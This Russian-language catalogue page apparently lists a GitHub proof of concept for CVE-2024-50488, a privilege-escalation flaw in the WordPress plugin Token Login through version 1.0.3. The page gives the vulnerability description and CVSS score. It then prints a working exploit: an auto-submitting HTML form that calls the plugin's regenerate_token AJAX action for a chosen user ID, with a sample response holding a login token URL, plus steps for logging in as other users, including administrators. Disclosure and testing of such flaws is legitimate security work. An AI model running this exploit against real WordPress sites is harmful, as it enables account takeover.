Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-50488 — Token Login <= 1.0.3 - Аутентифицированное (Subscriber+) повышение привилегий | Kitploit
Инструменты/GitHubGitHub/randomrobbiebf/cve-2024-50488
Аутентификация и авторизацияПовышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubrandomrobbiebf/cve-2024-50488

CVE-2024-50488

Token Login <= 1.0.3 - Аутентифицированное (Subscriber+) повышение привилегий

Репозиторий
31 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-50488

Token Login <= 1.0.3 - Аутентифицированное (Подписчик+) повышение привилегий

Описание:

Плагин Auto Login, использующий безопасный URL с токеном. Ограничение входа по ролям. Плагин для WordPress уязвим к повышению привилегий через захват учетной записи во всех версиях до 1.0.3 включительно. Это связано с тем, что плагин неправильно проверяет, имеет ли пользователь разрешение на генерацию токена входа для других пользователей. Это позволяет аутентифицированным злоумышленникам, имеющим доступ уровня подписчика и выше, входить в систему под другими пользователями, включая администраторов.

root@kitploit:~
Published: 2024-10-25 00:00:00  
CVE: CVE-2024-50488  
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H  
CVSS Score: 8.8  
Slugs: token-login  

PoC

Войдите в систему и запустите эту HTML-форму. Измените URL на сайт WordPress, на котором вы авторизованы. Измените ID на пользователя, для которого хотите сгенерировать токен. Скопируйте URL, и вы сможете войти под ним.

root@kitploit:~
<html>  
  <body>  
    <form action="http://kubernetes.docker.internal/wp-admin/admin-ajax.php" method="POST">  
      <input type="hidden" name="action" value="tl&#95;admin&#95;ajax&#95;action" />  
      <input type="hidden" name="method" value="regenerate&#95;token" />  
      <input type="hidden" name="user&#95;id" value="7" />  
      <input type="submit" value="Submit request" />  
    </form>  
    <script>  
      history.pushState('', '', '/');  
      document.forms[0].submit();  
    </script>  
  </body>  
</html>  

Ответ

root@kitploit:~
{"status":"success","message":"Successfully regenerated token!","token_url":"http:\/\/kubernetes.docker.internal?__token__=1c8dc9406bc444d1f5cea37fae130f92"}  
Скачать инструмент